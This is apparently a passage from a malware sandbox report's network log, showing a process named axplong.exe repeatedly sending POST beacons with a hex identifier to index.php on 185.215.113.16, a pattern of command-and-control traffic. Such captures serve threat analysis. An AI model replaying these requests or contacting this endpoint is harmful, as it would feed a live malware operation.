Jul 27, 2024 09:35:44.306009054 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.6	49758	185.215.113.16	80	5608	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 09:35:44.415997028 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 09:35:45.193861961 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 09:35:45.194870949 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 27, 2024 09:35:45.441298962 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.6	49759	185.215.113.16	80	5608	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 09:35:45.557847023 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 09:35:46.307174921 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 09:35:46.307948112 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 27, 2024 09:35:46.558394909 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.6	49760	185.215.113.16	80	5608	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 09:35:46.681365013 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 09:35:47.552406073 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 09:35:47.553220987 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 27, 2024 09:35:47.800590038 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.6	49761	185.215.113.16	80	5608	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 09:35:47.915712118 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 09:35:48.660119057 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 09:35:48.662208080 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 27, 2024 09:35:48.908530951 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.6	49762	185.215.113.16	80	5608	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 09:35:49.025408030 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 09:35:49.774312973 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 09:35:49.775111914 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 27, 2024 09:35:50.024039030 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.6	49763	185.215.113.16	80	5608	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 09:35:50.134265900 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 09:35:51.257580042 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 09:35:51.258460999 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 27, 2024 09:35:51.258527994 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 09:35:51.511944056 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.6	49764	185.215.113.16	80	5608	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 09:35:51.634604931 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 09:35:52.373470068 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 09:35:52.376091003 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 27, 2024 09:35:52.621944904 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.6	49765	185.215.113.16	80	5608	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 09:35:52.744641066 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 09:35:53.527568102 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 09:35:53.528465033 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 27, 2024 09:35:53.781541109 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.6	49766	185.215.113.16	80	5608	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 09:35:53.902306080 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 09:35:54.759404898 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 09:35:54.760112047 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 27, 2024 09:35:55.006926060 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.6	49767	185.215.113.16	80	5608	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 09:35:55.121442080 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 09:35:55.870734930 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 09:35:55.871516943 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 27, 2024 09:35:56.121731043 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.6	49768	185.215.113.16	80	5608	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 09:35:56.246049881 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 09:35:57.011584044 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 09:35:57.012387037 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 27, 2024 09:35:57.263676882 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.6	49769	185.215.113.16	80	5608	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 09:35:57.385561943 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 09:35:58.130425930 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 09:35:58.131138086 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 27, 2024 09:35:58.376444101 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 07:35:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.6	49770	185.215.113.16	80	5608	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 09:35:58.493488073 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
